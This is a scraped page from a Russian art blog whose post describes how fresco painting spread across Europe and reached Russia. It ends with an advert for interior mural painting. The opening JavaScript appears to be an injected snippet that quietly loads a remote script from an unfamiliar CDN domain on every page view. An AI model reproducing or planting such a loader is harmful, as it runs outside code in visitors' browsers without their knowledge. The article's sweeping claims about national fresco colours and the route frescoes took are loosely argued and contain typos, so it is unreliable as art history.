, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Пользовательский поиск

Добро пожаловать

Советую посмотреть

Страницы

Свежие комментарии

Обмен ссылками

Картины, портреты, критика живописи, Art-дилер




style="display:inline-block;width:120px;height:600px"
data-ad-client="ca-pub-5725625417417931"
data-ad-slot="8961029732">


« | Главная | »

Фрески

Автор: Дмитрий Алмазов | 17 Фев 2014

ФрескиФрески - особый вид нанесения красок на стену. Всем прекрасно известна эта техника работы. Точная дата появления фресок неизвестна. Считается, что они появились в районе Эгейского моря. Потом из этого района они перекочевали в Италию.

Итальянские мастера использовали фрески для росписи домов, храмов. В солнечной стране преобладали оранжевые краски: терракотовый, охристый, персиковых; также доминировали синие цвета: лазурный, цвет морской волны, индиго и, конечно, голубой.

Постепенно фрески появляются в других европейских стран. Первыми странами, которые стали использовать данную технику, стали соседи Италии: Франция и Испания. Французские и испанские фрески очень похожи между собой. Ведь они появились на этих территориях в одно и тоже время. Особенностью в этих странах является самодержавного царствие красного цвета, который присутствуют абсолютно во всех зданиях того времени: и в домах, и в храмах, и в королевских резиденциях.

Дальнейшее путешествие фресок выбирает себе остановку в Германии. Германские  фрески в основном находится в костелах. Они обладают фантастическим величием и "метровой красотой". "Мертвая красота" - это холодные тона, которая играют в бликах алтарных свечей. Это, конечно же, темные цвета: туманный серый, благородный черный и насыщенный коричневый. Полное отсутствие синего цвета погружает нас в другую реальность. Можно посетить костелы в Дрездене и Мюнхене, где вы сможете насладиться этой красотой. Немецкая культура смогла создать новый, ранее не существовавший, вид фресок, который потом отразился и в нашей культуре.

Потом фрески-путешественницы совершают возвращение в родную Италию и открывают венецианский  период. Но об этом периоде путешествия мы с вами погорим в следующем рассказе.

ФрескиПосле родины наши вояжеры отправляются в туманный Альбион в Голландию. К сожалению, королевская Англия не приняла новый вид искусства. В центральной части страны сохранились храмы с фресками, но их количество до безобразия ничтожно. В северной, южной и восточной Англии фрески не получили развития. Голландские фрески также, как и английские, немногочисленны. Они обладают холодными тонами, которые голландцы заимствовали у немцев, четкой прописью и отлаженностью техникой. Важной особенностью голландских фресок является присутствие осеннего, слегка затемненного, зеленого цвета, который гармонирует с серыми тонами. Но в отличие от германских фресок, голландские сохранились не только в костелах, но еще и в жилых домах богатых фламандцев. Их период существования в данных странах был очень коротким и не успел оставить после себя ярких творений.

После долгих путешествий по миру фрески добрались до России. В нашей стране фрески сияли в полной красоте: они не использовались в домах, а были только в храмах. Храмовые фрески пестрили ярко-синими, ярко-красными, ярко-зелеными цветами. В каждой русской фрески присутствует золотыми и черные тона, как символы богатства и плодородства.

На мой взгляд, прекрасным представителем древнерусских фресок является Софийский собор в Киеве, с которым я вас познакомлю в следующем рассказе.

Художники Лаборатории Искусства украсят Ваш интерьер росписью по заранее подготовленному эскизу.

Темы: о Живописи | Ваш отзыв »

Отзывы

Перед отправкой формы:
Лаборатория Искусства работает на WordPress